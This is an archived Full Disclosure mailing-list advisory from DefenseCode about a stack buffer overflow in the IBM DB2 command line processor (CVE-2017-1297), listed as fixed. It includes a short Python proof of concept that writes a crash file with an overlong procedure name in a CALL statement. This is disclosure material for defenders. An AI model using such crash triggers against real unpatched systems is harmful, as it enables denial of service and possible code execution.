[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] DefenseCode Security Advisory: IBM DB2 Command Line Processor Buffer Overflow
- From: DefenseCode <defensecode AT defensecode.com>
- Subject: [FD] DefenseCode Security Advisory: IBM DB2 Command Line Processor Buffer Overflow
- Date: Mon, 26 Jun 2017 13:21:29 +0200
- Arc-authentication-results: i=1; mx.google.com; dkim=neutral (body hash did not verify) firstname.lastname@example.org header.b=yjZnXtAF; spf=pass (google.com: domain of fulldisclosure-bounces AT seclists.org designates 18.104.22.168 as permitted sender) smtp.mailfrom=fulldisclosure-bounces AT seclists.org
- Arc-message-signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=sender:errors-to:content-transfer-encoding:list-subscribe:list-help :list-post:list-unsubscribe:list-id:precedence:subject :content-language:mime-version:user-agent:date:message-id:from:to :dkim-signature:delivered-to:arc-authentication-results; bh=d1Uv616UII3WO/pYwSeOuIWYFtyI7+GUQet8pp040Fc=; b=KkXgDW10RmTIWRPVSoMt2hUQnbqSjtVV/ueiqoCmHJP+k5T0P6Xc7WCBhn54bd8x4b E3Y09DSCDRpZchacDt8T44SRzy5IEBj5beGU0rx+QYTDcFbdBHBTMRu8CXvKaVW5GHVB Z4ef30JniqU7x+Yo5E5WN9Dv16AltpY+YbfzHHrXPYcnnwmi5Hd3lSHRy/19nqMYwWgS QoljHxzdR5GdQEikIPmElS3deh7y2O3CC5qN/qU/83lO+XPu90cSHejiS692kb+Opny9 jq8XvnuPUWlTB+SoZ0b/nlKX+fMaavAEDsBqwZXucQVETrHr/u1GIwuiGxyTXZ9hTvMO QBUw==
- Arc-seal: i=1; a=rsa-sha256; t=1498516595; cv=none; d=google.com; s=arc-20160816; b=pVcPDzQSZczKpr/I0MAT63991zLwKJIZVBYcssAgVxQRAWKjYouzJkHLOm6x+eE3o0 xWIlOPziJpx5o45Cbm1yJYWe/GNSddzxUSXRPMqaugL62Q0uYIFWSFHz9zrVGgzr48RW PEzXQY5lqus6y4CLtZLAZAnaSmyZIILYRykO4KokWEokQqjjJnaGY4rlvVeyriM2UyGh 1yqa4wMczvNxki3EGMxyNdEFfSBQKnjj/OKY9wLY9WKHjb28sZTIv1G6vwpF++BjgkOk C6S46L6T+vhrHpAGU5HNaqKts0hJHsD9vI4v9UsXms/Cqsp11AahODeway5W0fHqv38w AUFg==
- Sender: "Fulldisclosure" <fulldisclosure-bounces AT seclists.org>
- To: bugtraq AT securityfocus.com, fulldisclosure AT seclists.org
DefenseCode Security Advisory
IBM DB2 Command Line Processor Buffer Overflow
Advisory ID: DC-2017-04-002
Advisory Title: IBM DB2 Command Line Processor Buffer Overflow
Software: IBM DB2
Version: V9.7, V10.1, V10.5 and V11.1 on all platforms
Vendor Status: Vendor Contacted / Fixed (CVE-2017-1297)
Release Date: 26.06.2017
1. General Overview
IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) Command
Line Process (CLP) is vulnerable to a stack based buffer overflow, caused
by improper bounds checking which could allow an attacker to execute
arbitrary code. The vulnerability is triggered by providing an overly
long procedure name inside a CALL statement.
2. Software Overview
DB2 is a database product from IBM. It is a Relational Database Management
System. DB2 is designed to store, analyze and retrieve the data efficiently.
DB2 currently supports Linux, UNIX and Windows platforms.
db2bp is a persistent background process for the DB2 Command Line
and it is the process which actually connects to the database.
3. Brief Vulnerability Description
By providing a specially crafted command file to the db2 CLP utility, it is
possible to cause a buffer overflow and possibly hijack the execution flow
of the program. Crafted file contains a CALL statement with an overly long
3.1 Proof of Concept
The following python script will generate a proof of concept .sql crash
file that can be used to verify the vulnerability:
load_overflow = 'A' * 1000
statement = "CALL " + load_overflow + ";"
crash_file = open("crash.sql", "w")
PoC usage: db2 -f crash.sql
Vulnerability discovered by Leon Juranic, further analysis by Bosko
5. About DefenseCode
DefenseCode L.L.C. delivers products and services designed to analyze
web, desktop and mobile applications for security vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security Testing,
Testing) solution for performing extensive security audits of
code. ThunderScan performs fast and accurate analyses of large and complex
source code projects delivering precise results and low false positive rate.
DefenseCode WebScanner is a DAST (Dynamic Application Security Testing,
Testing) solution for comprehensive security audits of active web
WebScanner will test a website's security by carrying out a large number of
attacks using the most advanced techniques, just as a real attacker would.
Subscribe for free software trial on our website http://www.defensecode.com/
Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/